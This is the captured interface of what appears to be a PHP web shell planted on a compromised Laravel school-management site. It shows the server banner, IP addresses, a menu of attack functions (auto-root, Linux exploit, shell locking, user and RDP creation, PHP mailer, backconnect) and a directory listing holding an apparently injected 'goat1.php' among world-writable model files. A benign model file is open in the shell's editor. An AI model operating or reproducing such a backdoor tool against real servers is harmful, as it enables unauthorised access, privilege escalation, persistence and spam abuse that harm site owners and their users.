Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.78
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo10.com /
app /
Models /
[ HOME SHELL ]
Name
Size
Permission
Action
.htaccess
127
B
-r--r--r--
Announcement.php
298
B
-rw-rw-rw-
AssessmentComponent.php
459
B
-rw-rw-rw-
Assignment.php
571
B
-rw-rw-rw-
Attendance.php
454
B
-rw-rw-rw-
AuditLog.php
286
B
-rw-rw-rw-
Book.php
281
B
-rw-rw-rw-
BookIssue.php
573
B
-rw-rw-rw-
ClassSection.php
840
B
-rw-rw-rw-
CourseOrder.php
386
B
-rw-rw-rw-
Department.php
487
B
-rw-rw-rw-
Enrollment.php
918
B
-rw-rw-rw-
Event.php
688
B
-rw-rw-rw-
Faq.php
225
B
-rw-rw-rw-
FeeStructure.php
489
B
-rw-rw-rw-
FeeWaiver.php
752
B
-rw-rw-rw-
Gallery.php
229
B
-rw-rw-rw-
Grade.php
516
B
-rw-rw-rw-
GradingScale.php
355
B
-rw-rw-rw-
HomeFeature.php
1.2
KB
-rw-rw-rw-
HomeModule.php
1.89
KB
-rw-rw-rw-
HomePageContent.php
1.67
KB
-rw-rw-rw-
Hostel.php
498
B
-rw-rw-rw-
HostelAssignment.php
883
B
-rw-rw-rw-
HostelRoom.php
995
B
-rw-rw-rw-
Invoice.php
921
B
-rw-rw-rw-
InvoiceInstallment.php
390
B
-rw-rw-rw-
InvoiceItem.php
402
B
-rw-rw-rw-
MediaItem.php
272
B
-rw-rw-rw-
NewsPost.php
424
B
-rw-rw-rw-
Payment.php
484
B
-rw-rw-rw-
Payroll.php
415
B
-rw-rw-rw-
Program.php
734
B
-rw-rw-rw-
Room.php
291
B
-rw-rw-rw-
SiteSetting.php
252
B
-rw-rw-rw-
SliderImage.php
233
B
-rw-rw-rw-
Staff.php
423
B
-rw-rw-rw-
Student.php
1
KB
-rw-rw-rw-
StudentDocument.php
297
B
-rw-rw-rw-
StudentTransfer.php
506
B
-rw-rw-rw-
Subject.php
910
B
-rw-rw-rw-
Teacher.php
824
B
-rw-rw-rw-
Term.php
661
B
-rw-rw-rw-
TransportRoute.php
291
B
-rw-rw-rw-
User.php
1.07
KB
-rw-rw-rw-
Vehicle.php
316
B
-rw-rw-rw-
goat1.php
143.87
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : HomeFeature.php
<?php namespace App\Models; use Illuminate\Database\Eloquent\Model; class HomeFeature extends Model { protected $guarded = []; protected function casts(): array { return ['is_published' => 'boolean']; } public static function defaults(): array { return [ [ 'title' => 'Education Services', 'description' => 'Admission, students, classes, grades, attendance, and transcripts in one place.', 'theme' => 'teal', 'sort_order' => 1, 'is_published' => true, ], [ 'title' => 'International Hubs', 'description' => 'Public web, events, gallery, news, applicant tracking, and program discovery.', 'theme' => 'coral', 'sort_order' => 2, 'is_published' => true, ], [ 'title' => "Bachelor's and Master's", 'description' => 'Course catalog, teacher assignment, fee collection, and academic reporting.', 'theme' => 'teal', 'sort_order' => 3, 'is_published' => true, ], ]; } }
Close